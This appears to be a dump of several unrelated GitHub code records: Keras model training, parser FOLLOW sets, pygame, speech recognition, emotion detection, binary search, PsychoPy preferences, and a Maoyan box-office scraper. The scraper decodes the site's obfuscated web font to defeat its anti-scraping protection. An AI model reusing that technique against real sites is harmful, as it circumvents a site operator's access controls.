self.final_data\n model = models.clone_model(clean_model)\n model.compile(\n optimizer=self.params.get(\"optimizer\"), loss=self.loss, metrics=self.metrics\n )\n batchsize = self.params.get(\"batchsize\")\n history = model.fit(\n x_train,\n y_train,\n epochs=self.max_epochs,\n validation_data=(x_valid, y_valid),\n batch_size=batchsize,\n callbacks=[\n EarlyStopping(\n monitor=\"loss\",\n patience=self.early_stop_train_patience,\n restore_best_weights=True,\n verbose=self.verbose,\n start_from_epoch=8,\n ),\n EarlyStopping(\n monitor=\"val_loss\",\n patience=self.early_stop_valid_patience,\n restore_best_weights=True,\n verbose=self.verbose,\n start_from_epoch=8,\n ),\n ],\n verbose=self.verbose,\n shuffle=False,\n )\n self.epochs_record = history.history\n epochs = len(history.history[\"loss\"])\n loss = model.evaluate(x_train, y_train, batch_size=batchsize, verbose=0)[0]\n val_loss = model.evaluate(x_valid, y_valid, batch_size=batchsize, verbose=0)[0]\n test_loss = []\n if self.test_data is not None:\n timestamp = self.params.get(\"timestamp\")\n for test in self.test_data:\n x_test, y_test = group_data(test, timestamp, self.model_class.target_function)\n test_loss.append(model.evaluate(x_test, y_test, batch_size=batchsize, verbose=0)[0])\n elif len(x_test)>0:\n test_loss.append(model.evaluate(x_test, y_test, batch_size=batchsize, verbose=0)[0])\n self.model = model\n return epochs, loss, val_loss, test_loss\n\n\nclass ModelTest(ModelOperation):\n def __init__(self, model_class, data, options, *args, **kwargs):\n super().__init__(model_class=model_class, data=data, *args, **kwargs)\n self.final_options = [\n (k, (v if isinstance(v, list) else [v]))\n for k, v in options.items()\n if not (isinstance(v, list) and len(v) == 0)\n ]\n for name1, param1 in self.defalut_params.items():\n found = False\n for name2, param2 in self.final_options:\n if name1 == name2:\n found = True\n if not found:\n self.final_options.append((name1, [param1]))\n self.current_options = [None] * len(self.final_options)\n\n def process_options(self):\n self.final_data = list(self.raw_data)\n self.params = {}\n for i in range(len(self.layer_options)):\n self.layer_options[i] = None\n for i, (name, options) in enumerate(self.final_options):\n option_idx = self.current_options[i]\n option = options[option_idx]\n if name == \"preprocess\" and option is not None:\n for i in range(3):\n if self.test_data and i==2: continue\n self.final_data[i] = option.transform(self.final_data[i])\n if name[:5] == \"layer\":\n layer_number = int(name[5:])\n self.layer_options[layer_number] = option\n self.params[name] = option\n timestamp = self.params.get(\"timestamp\")\n for i in range(3):\n self.final_data[i] = group_data(self.final_data[i], timestamp, self.model_class.target_function)\n\n def run(self):\n self.history = []\n self.test(0)\n output_path = os.path.join(\"test_results\", str(int(time.time())) + \".csv\")\n pd.DataFrame(\n data=self.history,\n columns=list(next(zip(*self.final_options)))\n + [\"avg_epochs\", \"avg_loss\", \"avg_valid_loss\"]+ [f\"avg_test_loss_{i}\" for i in range(len(self.test_data))],\n ).to_csv(output_path)\n\n def test(self, option_idx):\n if option_idx == len(self.final_options):\n return self.build_and_train()\n name, options = self.final_options[option_idx]\n for i, v in enumerate(options):\n self.current_options[option_idx] = i\n self.test(option_idx + 1)\n\n def build_and_train(self):\n self.process_options()\n print(\"=================================================================\")\n [\n print(f\"{name:12}: {self.params.get(name) or 'No Change'}\")\n for name in self.params.keys()\n ]\n print()\n model = self.build()\n # model.summary()\n train_results = []\n # labels = [\"round\", \"epochs\", \"train\", \"valid\", \"test\"]\n # print(\"{:>8} {:>8} {:>8} {:>8} {:>8}\".format(*labels))\n for i in range(self.num_train_per_config):\n record = self.train(model)\n record = list(record[:-1]) + list(record[-1])\n train_results.append(record)\n # print(\"{:8} {:8.0f} {:8.4f} {:8.4f} {:8.4f}\".format(i, *record))\n record = [sum(i) / len(i) for i in zip(*train_results)]\n print((\"{:>8} {:8.0f}\"+\" {:8.4f}\"*(len(record)-1)).format(\"avg\", *record))\n self.history.append(\n [self.params.get(name) or \"No Change\" for name in self.params.keys()]\n + record\n )\n print(\"-----------------------------------------------------------------\\n\")\n\n\nclass ModelTrain(ModelOperation):\n def __init__(self, model_class, data, options, *args, **kwargs):\n super().__init__(model_class=model_class, data=data, *args, **kwargs)\n for name, param in options.items():\n self.params[name] = param\n\n option = self.params.get(\"preprocess\")\n self.final_data = list(self.raw_data)\n if option is not None:\n for i in range(3):\n if self.test_data and i==2: continue\n self.final_data[i] = option.transform(self.final_data[i]) \n for i in range(3):\n self.final_data[i] = group_data(\n self.final_data[i], self.params.get(\"timestamp\"), self.model_class.target_function\n )\n\n def run(self):\n print(\"=================================================================\")\n [\n print(f\"{name:12}: {self.params.get(name) or 'No Change'}\")\n for name in self.params.keys()\n ]\n print()\n model = self.build()\n train_results = []\n # labels = [\"round\", \"epochs\", \"train\", \"valid\", \"test\"]\n # print(\"{:>8} {:>8} {:>8} {:>8} {:>8}\".format(*labels))\n models = []\n # for i in range(self.num_train_per_config):\n record = self.train(model)\n train_results.append(record)\n print(record)\n # print(\"{:8} {:8.0f} {:8.4f} {:8.4f} {:8.4f}\".format(i, *record))\n # models.append(self.model)\n try:\n # number = int(input(\"Enter the round number to save model: \"))\n # self.save_model(models[number], self.epochs_record)\n self.save_model(self.model, self.epochs_record)\n except Exception as e:\n print(e)\n print(\"Model not saved.\")\n print(\"-----------------------------------------------------------------\\n\")\n\n\n def save_model(self, model, record):\n join = os.path.join\n model_path = join(\"model\", str(int(time.time())))\n if not os.path.exists(model_path):\n os.mkdir(model_path)\n models.save_model(model, join(model_path, 'model.h5'))\n output_path = join(model_path, 'history.csv')\n pd.DataFrame(data=record).to_csv(output_path)\n with open(join(model_path, 'info.txt'), 'w') as f:\n # labels = [\"epochs\", \"train\", \"valid\", \"test\"]\n # f.write(\"{:>8} {:>8} {:>8} {:>8}\\n\".format(*labels))\n # f.write(\"{:8.0f} {:8.4f} {:8.4f} {:8.4f}\\n\\n\".format(*record))\n [f.write(f'{str(k)}: {str(v)}\\n') for k, v in self.params.items()]\n print(f\"Model saved to <{model_path}>.\")\n","repo_name":"huangruoqi/computer_vision_learning","sub_path":"src/mutils.py","file_name":"mutils.py","file_ext":"py","file_size_in_byte":14832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43912766408","text":"import first\n\ndef FOLLOW_(rule_list, VN, FIRST):\n\n change = 1\n FOLLOW = {}\n FOLLOW[\"root\"] = {'#'}\n for Vn in VN:\n if not FOLLOW.__contains__(Vn):\n FOLLOW[Vn] = set()\n for rule in rule_list:\n curr_number = rule.num\n curr_left = rule.left\n curr_right = rule.right\n curr_words = curr_right.split()\n i = 0\n for word in curr_words:\n if word == Vn:\n after = ' '.join(curr_words[i+1 :])\n after_f = first.FIRST_sequence(after, FIRST)\n FOLLOW[Vn] = FOLLOW[Vn] | (after_f-{'$'})\n i += 1\n \n while(change != 0):\n change = 0\n for Vn in VN:\n for rule in rule_list:\n curr_number = rule.num\n curr_left = rule.left\n curr_right = rule.right\n curr_words = curr_right.split()\n i = 0\n for word in curr_words:\n if word == Vn:\n after = ' '.join(curr_words[i+1:])\n after_f = first.FIRST_sequence(after,FIRST)\n if ('$' in after_f) or (i == (len(curr_words)-1)):\n before_len = len(FOLLOW[Vn])\n FOLLOW[Vn] = FOLLOW[Vn] | FOLLOW[curr_left]\n after_len = len(FOLLOW[Vn])\n if before_len != after_len:\n change += 1\n i += 1\n\n with open(\"FOLLOW.txt\", \"w\") as fp:\n for nonTerminalToken in VN:\n fp.write(nonTerminalToken + \"=\" + '[' + ','.join(FOLLOW[nonTerminalToken]) + ']' + '\\n')\n\n print(\"Finish making FOLLOW set as shown in FOLLOW.txt\")\n\n return FOLLOW","repo_name":"lllirunze/Compilation_Lab","sub_path":"syntactic_analyzer/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42371579327","text":"from pygame import sprite, Rect, Surface\n\nclass Counter(sprite.Sprite):\n def __init__(self, font, text, value, colour, position, scale):\n super().__init__()\n self.font = font\n self.text = text\n self.value = value\n self.colour = colour\n self.scale = scale\n self.text_surf = self.font.render(f\"{self.text}: {self.value}\", False, self.colour)\n self.image = Surface(scale).convert()\n self.image.set_colorkey((0, 0, 0))\n self.rect = Rect(position, scale)\n \n self.image.blit(self.text_surf, (10, 10))\n \n def update(self):\n self.text_surf = self.font.render(f\"{self.text}: {self.value}\", False, self.colour)\n self.image = Surface(self.scale).convert()\n self.image.set_colorkey((0, 0, 0))\n self.image.blit(self.text_surf, (10, 10))","repo_name":"Zain-Jaafar/Typing-Game","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70735193124","text":"from utils import Utils\nimport speech_recognition as sr\n\n\nclass listener:\n\n def listen(noiseControl=0):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n if noiseControl != 0:\n print(\"Please wait. Calibrating microphone...\")\n # listen for 3 seconds and create the ambient noise energy level\n r.adjust_for_ambient_noise(source, duration=noiseControl)\n print(\"You can now talk..\")\n audio = r.listen(source)\n try:\n return r.recognize_bing(audio, Utils.bingApiKey)\n except sr.UnknownValueError:\n print(Utils.roboName, \"could not understand audio\")\n except sr.RequestError as e:\n print(Utils.roboName, \"error; {0}\".format(e))\n","repo_name":"cunbm/cunbmev3","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29438468205","text":"import numpy as np\nimport cv2\nfrom keras.preprocessing import image\n\nface_cascade = cv2.CascadeClassifier(\"/home/greg/Documents/uni/AI/AI_emotion/haarcascade_frontalface_default.xml\")\n\ncap = cv2.VideoCapture(0)\n#-----------------------------\n#face expression recognizer initialization\n\nfrom keras.models import load_model\nmodel = load_model('my_newm.h5')\n\n#-----------------------------\n\nemotions = ('angry', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise')\n\nwhile(True):\n\n ret, img = cap.read()\n\t#img = cv2.imread('C:/Users/IS96273/Desktop/hababam.jpg')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n #print(faces) #locations of detected faces\n\n for (x,y,w,h) in faces:\n\t cv2.rectangle(img,(x,y),(x+w,y+h),(209,66,244),2) #draw rectangle to main image\n\n\t detected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face\n\t detected_face = cv2.cvtColor(detected_face, cv2.COLOR_BGR2GRAY) #transform to gray scale\n\t detected_face = cv2.resize(detected_face, (48, 48)) #resize to 48x48\n\n\t img_pixels = image.img_to_array(detected_face)\n\t img_pixels = np.expand_dims(img_pixels, axis = 0)\n\n\t img_pixels /= 255 #pixels are in scale of [0, 255]. normalize all pixels in scale of [0, 1]\n\n\n\n\t predictions = model.predict(img_pixels) #store probabilities of 7 expression\n\t #find max indexed array 0: angry, 1:disgust, 2:fear, 3:happy, 4:sad, 5:surprise, 6:neutral\n\t max_index = np.argmax(predictions[0])\n\t emotion = emotions[max_index]\n\t # write emotion text above rectangle\n\t cv2.putText(img, emotion, (int(x), int(y)), cv2.FONT_HERSHEY_DUPLEX, 1, (57,244,0), 2)\n\t #process on detected face end\n\t #-----------------------\n\n print(max_index)\n value = np.amax(predictions)\n print(value)\n\n cv2.imshow('img',img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): #press q to quit\n break\n\n#kill open cv things\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"gregtuck/Greco-Roman","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27223312384","text":"import pytest\nfrom faker import Faker\n\nfrom common.modules.memo.infrastructure.entity import MemoEntity\nfrom common.modules.memo.infrastructure.repository import MemoRepositoryProtocol\n\nfrom common.tests import test_db_connect as db, AsyncSQLAlchemy, ko_faker, en_faker\nfrom common.tests.infrastructure.memo import get_memo_repository as memo_repo\n\n\n@pytest.mark.asyncio\nasync def test_fetch_all(en_faker: Faker, ko_faker: Faker, db: AsyncSQLAlchemy, memo_repo: MemoRepositoryProtocol):\n # given\n data = [\n {\n 'title': en_faker.sentence(),\n 'content': en_faker.text(),\n 'labels': en_faker.words()\n }\n for _ in range(3)\n ]\n entities = list(map(lambda md: MemoEntity(**md), data))\n\n async with db.session() as session:\n session.add_all(entities)\n await session.commit()\n\n # when\n result = await memo_repo.fetch_all()\n\n # then\n for memo in result:\n assert not memo.labels\n\n\n@pytest.mark.asyncio\nasync def test_fetch_by_id(en_faker: Faker, ko_faker: Faker, db: AsyncSQLAlchemy, memo_repo: MemoRepositoryProtocol):\n # given\n item_id = en_faker.random_int(1, 3)\n\n # when\n result = await memo_repo.fetch_by_id(item_id)\n\n # then\n assert result.id == item_id\n","repo_name":"NEONKID/python-mf-data-example","sub_path":"common/tests/infrastructure/memo/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"70315710886","text":"from typing import List\n\n\n# 版本1-左闭右闭区间\nclass Solution1:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums) - 1\n while l <= r:\n middle = (l + r) // 2\n if nums[middle] == target:\n return middle\n if target < nums[middle]:\n r = middle - 1\n elif target > nums[middle]:\n l = middle + 1\n return -1\n\n\n# 版本2-左闭右开区间\nclass Solution2:\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums)\n while l < r:\n middle = (l + r) // 2\n if target == nums[middle]:\n return middle\n elif target < nums[middle]:\n r = middle\n elif target > nums[middle]:\n l = middle + 1\n return -1\n\n\n# 方法3-递归\nclass Solution3:\n def search(self, nums: List[int], target: int) -> int:\n def binary_search(nums, target, l, r):\n if l > r:\n return -1\n middle = r + (l - r) // 2\n if target < nums[middle]:\n return binary_search(nums, target, l, middle - 1)\n elif target > nums[middle]:\n return binary_search(nums, target, middle + 1, r)\n else:\n return middle\n\n res = binary_search(nums, target, 0, len(nums) - 1)\n return res\n\n\nif __name__ == '__main__':\n nums1 = [-1, 0, 3, 5, 9, 12]\n target1 = 9\n nums2 = [-1, 0, 3, 5, 9, 12]\n target2 = 2\n s1 = Solution1()\n s2 = Solution2()\n s3 = Solution3()\n print(s1.search(nums1, target1))\n print(s1.search(nums2, target2))\n print(s2.search(nums1, target1))\n print(s2.search(nums2, target2))\n print(s3.search(nums1, target1))\n print(s3.search(nums2, target2))\n","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/数组/704_search.py","file_name":"704_search.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26393248325","text":"import json\nimport requests\nfrom fake_useragent import UserAgent\nfrom lxml import etree\nfrom fontTools.ttLib import TTFont\nimport re\n\nua = UserAgent()\nurl = 'http://maoyan.com/board/1'\nheaders = {\n 'User-Agent': ua.random\n}\n\n\ndef get_top(response):\n dl_list = response.xpath('//dl[@class=\"board-wrapper\"]/dd')\n # print(len(dl))\n for dl in dl_list:\n # 排名\n top = dl.xpath('./i/text()')[0]\n # print(top)\n # 名称\n name = dl.xpath('.//p[@class=\"name\"]/a/text()')[0]\n # print(name)\n # 主演\n starring = dl.xpath('.//p[@class=\"star\"]/text()')[0]\n # print(starring)\n # 上映时间\n show_time = dl.xpath('.//p[@class=\"releasetime\"]/text()')[0]\n # print(show_time)\n\n # 实时票房\n real_time_list = dl.xpath('.//p[@class=\"realtime\"]//text()')\n real_time = real_time_list[0].strip() + real_time_list[1].strip() + real_time_list[2].strip()\n # print(real_time)\n # 总票房\n overall_ticket_list = dl.xpath('.//p[@class=\"total-boxoffice\"]//text()')\n overall_ticket = overall_ticket_list[0].strip() + overall_ticket_list[1].strip() + overall_ticket_list[2].strip()\n # print(overall_ticket)\n yield top, name, starring, show_time, real_time, overall_ticket\n\n\n# TODO 需要将所要爬取页面的字体文件保存到本地为basefonts.woff\ndef fonts(response_index):\n try:\n # 获取字体文件的url\n woff_ = re.search(r\"url\\('(.*\\.woff)'\\)\", response_index).group(1)\n # print(woff_)\n woff_url = 'http:' + woff_\n response_woff = requests.get(woff_url, headers=headers).content\n # 将字体文件保存到本地, 每次爬取都需要保存\n with open('fonts.woff', 'wb') as f:\n f.write(response_woff)\n\n # baseFonts: 从网站的源代码的font-face中的url下载woff文件 并改名为basefonts.woff\n baseFonts = TTFont('basefonts.woff')\n # 用http://fontstore.baidu.com/static/editor/index.html#解析basefonts.woff文件\n # base_nums, base_fonts 需要自己手动解析映射关系, 要和basefonts.woff一致\n base_nums = ['9', '5', '6', '7', '3', '8', '4', '2', '1', '0']\n base_fonts = ['uniF59C', 'uniF65B', 'uniE3C2', 'uniECD9', 'uniE676', 'uniF7AD', 'uniF4B7', 'uniF7F7', 'uniE683', 'uniF044']\n # onlineFonts: 从get中解析出font-face的url, 并以二进制写入fonts.woff文件中\n onlineFonts = TTFont('fonts.woff')\n\n # onlineFonts.saveXML('test.xml')\n\n # 获取数字的编码\n uni_list = onlineFonts.getGlyphNames()[1:-1]\n temp = {}\n # 解析字体库\n for i in range(10):\n # 获取fonts.woff中的第i个信息\n onlineGlyph = onlineFonts['glyf'][uni_list[i]]\n for j in range(10):\n # 获取basefonts.woff中的第j个信息\n baseGlyph = baseFonts['glyf'][base_fonts[j]]\n # 如果fonts.woff的第i个信息与basefonts.woff的第j个信息相同, 就保存在temp中\n if onlineGlyph == baseGlyph:\n # 键为f&@x加onts.woff的第i个小写信息, 值为basefonts.woff的第j个信息\n temp[\"&#x\" + uni_list[i][3:].lower() + ';'] = base_nums[j]\n # print(temp)\n # 字符替换\n pat = '(' + '|'.join(temp.keys()) + ')'\n response_index = re.sub(pat, lambda x: temp[x.group()], response_index)\n response = etree.HTML(response_index)\n return response\n except:\n print('解析失败!')\n\n\ndef with_to_file(item):\n # 注意编码\n with open('content.txt', 'a', encoding='utf8') as f:\n f.write(json.dumps(item, ensure_ascii=False) + '\\n')\n\n\ndef main():\n response_index = requests.get(url, headers=headers).text\n # print(re.text)\n # 将页面的字体替换\n response = fonts(response_index)\n # 爬取页面信息\n for item in get_top(response):\n print(item)\n # 写入文件\n with_to_file(item)\n\n\nif __name__ == '__main__':\n main()","repo_name":"mizhiX/knowledge-point","sub_path":"字体文件反爬/猫眼电影_国内票房榜_字体文件反爬.py","file_name":"猫眼电影_国内票房榜_字体文件反爬.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21430943368","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport sys\nfrom pathlib import Path\n\nimport wx\nimport wx.propgrid as pg\nimport wx.py\nimport platform\nimport re\nimport os\n\nfrom psychopy.app.themes import icons\nfrom . import dialogs\nfrom psychopy import localization, prefs\nfrom psychopy.localization import _translate\nfrom pkg_resources import parse_version\nfrom psychopy import sound\nfrom psychopy.app.utils import getSystemFonts\nimport collections\n\n# labels mappings for display:\n_localized = {\n # category labels\n 'General': _translate('General'),\n 'Application': _translate('Application'),\n 'Key Bindings': _translate('Key Bindings'),\n 'Hardware': _translate('Hardware'),\n 'Connections': _translate('Connections'),\n # section labels\n 'general': _translate('general'),\n 'app': _translate('app'),\n 'builder': \"Builder\", # not localized\n 'coder': \"Coder\", # not localized\n 'runner': \"Runner\", # not localized\n 'hardware': _translate('Hardware'),\n 'connections': _translate('Connections'), # not 'connections'\n 'keyBindings': _translate('Key Bindings'), # not 'keyBindings'\n # pref labels in General section\n 'winType': _translate(\"window type\"),\n 'units': _translate(\"units\"),\n 'fullscr': _translate(\"full-screen\"),\n 'allowGUI': _translate(\"allow GUI\"),\n 'paths': _translate('paths'),\n 'flac': _translate('flac audio compression'),\n 'shutdownKey': _translate(\"shutdown key\"),\n 'shutdownKeyModifiers': _translate(\"shutdown key modifier keys\"),\n 'gammaErrorPolicy': _translate(\"gammaErrorPolicy\"),\n 'startUpPlugins': _translate(\"start up plugins\"),\n 'appKeyGoogleCloud':_translate('appKeyGoogleCloud'),\n 'transcrKeyAzure':_translate('transcrKeyAzure'),\n # pref labels in App section\n 'showStartupTips': _translate(\"show start-up tips\"),\n 'defaultView': _translate(\"default view\"),\n 'resetPrefs': _translate('reset preferences'),\n 'autoSavePrefs': _translate('auto-save prefs'),\n 'debugMode': _translate('debug mode'),\n 'locale': _translate('locale'),\n 'errorDialog': _translate('error dialog'),\n 'theme': _translate('theme'),\n # pref labels in Builder section\n 'reloadPrevExp': _translate('reload previous exp'),\n 'codeComponentLanguage': _translate('Code component language'),\n 'unclutteredNamespace': _translate('uncluttered namespace'),\n 'componentsFolders': _translate('components folders'),\n 'componentFilter':_translate('componentFilter'),\n 'hiddenComponents': _translate('hidden components'),\n 'unpackedDemosDir': _translate('unpacked demos dir'),\n 'savedDataFolder': _translate('saved data folder'),\n 'builderLayout': _translate('Builder layout'),\n 'alwaysShowReadme': _translate('always show readme'),\n 'maxFavorites': _translate('max favorites'),\n 'confirmRoutineClose': _translate('confirmRoutineClose'),\n # pref labels in Coder section\n 'readonly': _translate('read-only'),\n 'outputFont': _translate('output font'),\n 'codeFont': _translate('code font'),\n 'outputFontSize': _translate('output font size'),\n 'codeFontSize': _translate('code font size'),\n 'lineSpacing': _translate('lineSpacing'),\n 'edgeGuideColumn': _translate('edgeGuideColumn'),\n 'showSourceAsst': _translate('show source asst'),\n 'showOutput': _translate('show output'),\n 'autocomplete': _translate('auto complete'),\n 'reloadPrevFiles': _translate('reload previous files'),\n 'preferredShell': _translate('preferred shell'),\n # pref labels in KeyBindings section\n 'open': _translate('open'),\n 'new': _translate('new'),\n 'save': _translate('save'),\n 'saveAs': _translate('save as'),\n 'print': _translate('print'),\n 'close': _translate('close'),\n 'quit': _translate('quit'),\n 'preferences': _translate('preferences'),\n 'exportHTML': _translate('export HTML'),\n 'cut': _translate('cut'),\n 'copy': _translate('copy'),\n 'paste': _translate('paste'),\n 'duplicate': _translate('duplicate'),\n 'indent': _translate('indent'),\n 'dedent': _translate('dedent'),\n 'smartIndent': _translate('smart indent'),\n 'find': _translate('find'),\n 'findAgain': _translate('find again'),\n 'undo': _translate('undo'),\n 'redo': _translate('redo'),\n 'comment': _translate('comment'),\n 'uncomment': _translate('uncomment'),\n 'toggle comment': _translate('toggle comment'),\n 'fold': _translate('fold'),\n 'enlargeFont': _translate('enlarge Font'),\n 'shrinkFont': _translate('shrink Font'),\n 'analyseCode': _translate('analyze code'),\n 'compileScript': _translate('compile script'),\n 'runScript': _translate('run script'),\n 'runnerScript': _translate('runner script'),\n 'stopScript': _translate('stop script'),\n 'toggleWhitespace': _translate('toggle whitespace'),\n 'toggleEOLs': _translate('toggle EOLs'),\n 'toggleIndentGuides': _translate('toggle indent guides'),\n 'newRoutine': _translate('new Routine'),\n 'copyRoutine': _translate('copy Routine'),\n 'pasteRoutine': _translate('paste Routine'),\n 'pasteCompon': _translate('paste Component'),\n 'toggleOutputPanel': _translate('toggle output panel'),\n 'renameRoutine': _translate('rename Routine'),\n 'cycleWindows': _translate('cycle windows'),\n 'largerFlow': _translate('larger Flow'),\n 'smallerFlow': _translate('smaller Flow'),\n 'largerRoutine': _translate('larger routine'),\n 'smallerRoutine': _translate('smaller routine'),\n 'toggleReadme': _translate('toggle readme'),\n 'pavlovia_logIn': _translate('login to pavlovia'),\n 'OSF_logIn': _translate('login to OSF'),\n 'projectsSync': _translate('sync projects'),\n 'projectsFind': _translate('find projects'),\n 'projectsOpen': _translate('open projects'),\n 'projectsNew': _translate('new projects'),\n # pref labels in Hardware section\n 'audioLib': _translate(\"audio library\"),\n 'audioLatencyMode': _translate(\"audio latency mode\"),\n 'audioDriver': _translate(\"audio driver\"),\n 'audioDevice': _translate(\"audio device\"),\n 'parallelPorts': _translate(\"parallel ports\"),\n 'qmixConfiguration': _translate(\"Qmix configuration\"),\n 'highDPI': _translate('Try to support display high DPI'),\n # pref labels in Connections section\n 'proxy': _translate('proxy'),\n 'autoProxy': _translate('auto-proxy'),\n 'allowUsageStats': _translate('allow usage stats'),\n 'checkForUpdates': _translate('check for updates'),\n 'timeout': _translate('timeout'),\n # pref wxChoice lists:\n 'all': _translate('Builder, Coder and Runner'),\n 'keep': _translate('same as in the file'), # line endings\n 'abort': _translate('abort'), # gammaErrorPolicy\n 'warn': _translate('warn'), # gammaErrorPolicy\n # not translated:\n 'pix': 'pix',\n 'deg': 'deg',\n 'cm': 'cm',\n 'norm': 'norm',\n 'height': 'height',\n 'pyshell': 'pyshell',\n 'iPython': 'iPython',\n # obsolete labels\n 'largeIcons': _translate(\"large icons\"),\n 'darkMode': _translate(\"dark mode\"),\n 'highDPI': _translate('highDPI'),\n 'commentFont': _translate('comment font'),\n 'switchToBuilder': _translate('switch to Builder'),\n 'switchToCoder': _translate('switch to Coder'),\n 'switchToRunner': _translate('switch to Runner'),\n 'projectsLogIn': _translate('login to projects'),\n 'useRunner': _translate(\"use Runner\"),\n}\n# add pre-translated names-of-langauges, for display in locale pref:\n_localized.update(localization.locname)\n\naudioLatencyLabels = {0: _translate('Latency not important'),\n 1: _translate('Share low-latency driver'),\n 2: _translate('Exclusive low-latency'),\n 3: _translate('Aggressive low-latency'),\n 4: _translate('Latency critical')}\n\n\nclass PrefPropGrid(wx.Panel):\n \"\"\"Class for the property grid portion of the preference window.\"\"\"\n\n def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,\n size=wx.DefaultSize, style=wx.TAB_TRAVERSAL,\n name=wx.EmptyString):\n wx.Panel.__init__(\n self, parent, id=id, pos=pos, size=size, style=style, name=name)\n bSizer1 = wx.BoxSizer(wx.HORIZONTAL)\n self.app = wx.GetApp()\n\n self.lstPrefPages = wx.ListCtrl(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.LC_ALIGN_TOP | wx.LC_ICON | wx.LC_SINGLE_SEL)\n bSizer1.Add(self.lstPrefPages, 0,\n wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.TOP, 5)\n\n prefsImageSize = wx.Size(48, 48)\n self.prefsIndex = 0\n self.prefsImages = wx.ImageList(\n prefsImageSize.GetWidth(), prefsImageSize.GetHeight())\n self.lstPrefPages.AssignImageList(self.prefsImages, wx.IMAGE_LIST_NORMAL)\n\n self.proPrefs = pg.PropertyGridManager(\n self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\n wx.propgrid.PGMAN_DEFAULT_STYLE | wx.propgrid.PG_BOLD_MODIFIED |\n wx.propgrid.PG_DESCRIPTION | wx.TAB_TRAVERSAL)\n self.proPrefs.SetExtraStyle(wx.propgrid.PG_EX_MODE_BUTTONS)\n\n bSizer1.Add(self.proPrefs, 1, wx.ALL | wx.EXPAND, 5)\n\n self.SetSizer(bSizer1)\n self.Layout()\n\n # Connect Events\n self.lstPrefPages.Bind(\n wx.EVT_LIST_ITEM_DESELECTED, self.OnPrefPageDeselected)\n self.lstPrefPages.Bind(\n wx.EVT_LIST_ITEM_SELECTED, self.OnPrefPageSelected)\n self.proPrefs.Bind(pg.EVT_PG_CHANGED, self.OnPropPageChanged)\n self.proPrefs.Bind(pg.EVT_PG_CHANGING, self.OnPropPageChanging)\n\n # categories and their items are stored here\n self.sections = collections.OrderedDict()\n\n # pages in the property manager\n self.pages = dict()\n self.pageNames = dict()\n\n # help text\n self.helpText = dict()\n\n self.pageIdx = 0\n\n def __del__(self):\n pass\n\n def setSelection(self, page):\n \"\"\"Select the page.\"\"\"\n # set the page\n self.lstPrefPages.Focus(1)\n self.lstPrefPages.Select(page)\n\n def addPage(self, label, name, sections=(), bitmap=None):\n \"\"\"Add a page to the property grid manager.\"\"\"\n\n if name in self.pages.keys():\n raise ValueError(\"Page already exists.\")\n\n for s in sections:\n if s not in self.sections.keys():\n self.sections[s] = dict()\n\n nbBitmap = icons.ButtonIcon(stem=bitmap, size=(48, 48)).bitmap\n if nbBitmap.IsOk():\n self.prefsImages.Add(nbBitmap)\n\n self.pages[self.pageIdx] = (self.proPrefs.AddPage(name, wx.NullBitmap),\n list(sections))\n self.pageNames[name] = self.pageIdx\n self.lstPrefPages.InsertItem(\n self.lstPrefPages.GetItemCount(), _localized[label], self.pageIdx)\n\n self.pageIdx += 1\n\n def addStringItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value='', helpText=\"\"):\n \"\"\"Add a string property to a category.\n\n Parameters\n ----------\n section : str\n Category name to add the item too.\n label : str\n Label to be displayed in the property grid.\n name : str\n Internal name for the property.\n value : str\n Default value for the property.\n helpText: str\n Help text for this item.\n\n \"\"\"\n # create a new category if not present\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n # if isinstance(page, str):\n # page = self.proPrefs.GetPageByName(page)\n # else\n # page = self.proPrefs.GetPage(page)\n self.sections[section].update(\n {name: wx.propgrid.StringProperty(label, name, value=str(value))})\n\n self.helpText[name] = helpText\n\n def addStringArrayItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, values=(), helpText=\"\"):\n \"\"\"Add a string array item.\"\"\"\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: wx.propgrid.ArrayStringProperty(\n label, name, value=[str(i) for i in values])})\n\n self.helpText[name] = helpText\n\n def addBoolItem(self, section, label=wx.propgrid.PG_LABEL,\n name=wx.propgrid.PG_LABEL, value=False, helpText=\"\"):\n if section not in self.sections.keys():\n self.sections[section] = dict()\n\n self.sections[section].update(\n {name: 